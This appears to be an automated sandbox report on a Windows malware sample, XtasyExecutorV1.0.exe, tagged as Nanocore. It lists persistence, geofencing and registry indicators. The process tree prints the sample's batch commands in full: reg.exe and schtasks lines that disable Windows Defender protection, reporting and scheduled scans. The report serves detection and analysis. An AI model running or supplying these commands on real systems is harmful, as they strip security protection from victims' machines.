Analysis
-
max time kernel
126s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 20:40
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/Dmq7NE
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
https://gofile.io/d/Dmq7NE
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
https://gofile.io/d/Dmq7NE
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral4
Sample
https://gofile.io/d/Dmq7NE
Resource
win11-20241007-en
General
-
Target
https://gofile.io/d/Dmq7NE
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Nanocore family
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation XtasyExecutorV1.0.exe -
Executes dropped EXE 2 IoCs
pid Process 724 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Subsystem = "C:\\Program Files (x86)\\PCI Subsystem\\pciss.exe" XtasyExecutorV1.0.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XtasyExecutorV1.0.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\PCI Subsystem\pciss.exe XtasyExecutorV1.0.exe File opened for modification C:\Program Files (x86)\PCI Subsystem\pciss.exe XtasyExecutorV1.0.exe File created C:\Program Files (x86)\PCI Subsystem\pciss.exe\:SmartScreen:$DATA XtasyExecutorV1.0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutorV1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutorV1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 360487.crdownload:SmartScreen msedge.exe File created C:\Program Files (x86)\PCI Subsystem\pciss.exe\:SmartScreen:$DATA XtasyExecutorV1.0.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 2636 msedge.exe 2636 msedge.exe 4352 msedge.exe 4352 msedge.exe 532 identity_helper.exe 532 identity_helper.exe 4356 msedge.exe 4356 msedge.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 1708 XtasyExecutorV1.0.exe 2280 msedge.exe 2280 msedge.exe 2280 msedge.exe 2280 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1708 XtasyExecutorV1.0.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1708 XtasyExecutorV1.0.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe 4352 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4352 wrote to memory of 1408 4352 msedge.exe 83 PID 4352 wrote to memory of 1408 4352 msedge.exe 83 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 4060 4352 msedge.exe 84 PID 4352 wrote to memory of 2636 4352 msedge.exe 85 PID 4352 wrote to memory of 2636 4352 msedge.exe 85 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86 PID 4352 wrote to memory of 4816 4352 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Dmq7NE1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad17946f8,0x7ffad1794708,0x7ffad17947182⤵PID:1408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:22⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:82⤵PID:4816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:12⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:82⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:12⤵PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:12⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:12⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5144 /prefetch:82⤵PID:816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:12⤵PID:320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6120 /prefetch:82⤵PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,6028499217970007867,6259994498297073353,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356
-
-
C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe"C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:724
-
-
C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe"C:\Users\Admin\Downloads\XtasyExecutorV1.0.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\51ad5ee7.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:1436 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:1712
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:1796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:4520
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2280
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:2120
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:1776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
- System Location Discovery: System Language Discovery
PID:3856
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:1576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:1920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:4260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:4400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
